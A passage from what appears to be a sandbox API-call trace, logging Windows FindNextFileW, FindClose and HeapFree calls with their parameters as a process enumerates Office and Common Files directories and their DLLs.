cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 0 [0314.340] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0314.340] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0314.340] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb760eed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb760eed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb760eed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 0 [0314.340] FindClose (in: hFindFile=0x39482e8 | out: hFindFile=0x39482e8) returned 1 [0314.341] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0314.342] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb81fa9e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb81fa9e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb81fa9e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1db9f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OriginLetter.Dotx", cAlternateFileName="ORIGIN~3.DOT")) returned 1 [0314.342] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0314.343] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24517fc9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x24517fc9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x24517fc9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Presentation Designs", cAlternateFileName="PRESEN~1")) returned 1 [0314.345] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0314.345] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24517fc9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x24517fc9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x24517fc9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Presentation Designs", cAlternateFileName="PRESEN~1")) returned 0 [0314.345] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0314.346] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0314.346] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VFS", cAlternateFileName="")) returned 1 [0314.356] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0314.356] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc0c33db, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc0c33db, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x183c8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MySharePoints.ico", cAlternateFileName="MYSHAR~1.ICO")) returned 1 [0314.357] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0314.357] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a112a2, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x5a112a2, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x5a112a2, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISIO", cAlternateFileName="")) returned 1 [0314.358] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0314.358] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a112a2, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x5a112a2, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x5a112a2, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISIO", cAlternateFileName="")) returned 0 [0314.358] FindClose (in: hFindFile=0x39482e8 | out: hFindFile=0x39482e8) returned 1 [0314.358] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0314.359] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecf3682d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b809370, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b809370, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Help", cAlternateFileName="MICROS~1")) returned 1 [0314.366] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0314.366] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecf3682d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b809370, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b809370, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Help", cAlternateFileName="MICROS~1")) returned 0 [0314.366] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0314.366] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0314.366] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3c29db74, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3c29db74, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Common Programs", cAlternateFileName="COMMON~1")) returned 1 [0314.702] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0314.702] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x245b0966, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x245b0966, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x245d6b52, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x721, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OneDrive for Business.lnk", cAlternateFileName="ONEDRI~1.LNK")) returned 1 [0314.702] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0314.702] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x868ac6fd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x868ac6fd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0314.751] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0314.751] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x868ac6fd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8913323b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8913323b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="private", cAlternateFileName="")) returned 0 [0314.751] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0314.752] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0314.752] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xaf31749c, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xaf31749c, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ProgramFilesCommonX64", cAlternateFileName="PROGRA~3")) returned 1 [0314.753] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0314.754] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x868ac6fd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x52ea133, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x52ea133, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0315.222] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.222] FindNextFileW (in: hFindFile=0x3948468, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2f7aa31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f7aa31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x245fcdca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1702b0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0315.222] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0315.222] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x868ac6fd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb976f98, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb976f98, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0315.329] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.329] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf086f11e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf086f11e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf086f11e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="API-MS~2.DLL")) returned 1 [0315.331] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0315.331] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99b89f6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99b89f6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99b89f6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EURO", cAlternateFileName="")) returned 1 [0315.383] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0315.383] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2ca2e08, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14c6cb9, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x14c6cb9, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters", cAlternateFileName="")) returned 1 [0315.464] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0315.464] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2e1f46, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb976f98, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb976f98, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0315.467] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0315.467] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12910b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x26737b32, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x26737b32, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0315.470] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0315.470] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf472b09c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf472b09c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf472b09c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSClientDataMgr", cAlternateFileName="MSCLIE~1")) returned 1 [0315.470] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0315.470] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2803429, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x26bb01a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x26bb01a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0315.473] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.473] FindNextFileW (in: hFindFile=0x3948b28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xceb38292, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xceb38292, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe172e9be, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x22cad0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ACECORE.DLL", cAlternateFileName="")) returned 1 [0315.476] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.476] FindNextFileW (in: hFindFile=0x3948b28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe99511, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x24bcc96d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x24bcc96d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="DataModel", cAlternateFileName="DATAMO~1")) returned 1 [0315.479] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0315.480] FindNextFileW (in: hFindFile=0x3948828, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x381f2dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17e0c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.AnalysisServices.Common.dll", cAlternateFileName="MI1312~1.DLL")) returned 1 [0315.481] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41a3008 | out: hHeap=0x470000) returned 1 [0315.481] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8e69c | out: lpFindFileData=0x2e8e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4befc00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4befc00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4befc00, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0315.481] FindClose (in: hFindFile=0x3948768 | out: hFindFile=0x3948768) returned 1 [0315.481] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0315.481] FindNextFileW (in: hFindFile=0x3948828, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x447d6b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x447d6b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44a38de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c190, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Spatial.dll", cAlternateFileName="SYSTEM~1.DLL")) returned 1 [0315.482] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.482] FindNextFileW (in: hFindFile=0x3948b28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2803429, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc2803429, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc2803429, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="en-us", cAlternateFileName="")) returned 1 [0315.482] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.482] FindNextFileW (in: hFindFile=0x3948b28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4befc00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4befc00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x26a58c7d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x77e88, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="EXPSRV.DLL", cAlternateFileName="")) returned 1 [0315.484] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0315.484] FindNextFileW (in: hFindFile=0x3948468, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef915def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc8aa06f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc8f6526, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office.en-us", cAlternateFileName="OFFICE~1.EN-")) returned 0 [0315.484] FindClose (in: hFindFile=0x3948468 | out: hFindFile=0x3948468) returned 1 [0315.484] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.485] FindNextFileW (in: hFindFile=0x3948b28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0fbc434, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0fbc434, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf10a1263, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2c40, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="OFFREL.DLL", cAlternateFileName="")) returned 1 [0315.485] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0315.487] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16be2c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xc8d02b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc8d02b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROOF", cAlternateFileName="")) returned 1 [0315.488] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0315.488] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc576616a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x26bd6427, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x26bd6427, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smart Tag", cAlternateFileName="SMARTT~1")) returned 1 [0315.489] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.489] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc62081b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc62081b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc62081b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1bac0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="FBIBLIO.DLL", cAlternateFileName="")) returned 1 [0315.491] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0315.491] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x26bd6427, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x26bd6427, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x26bd6427, 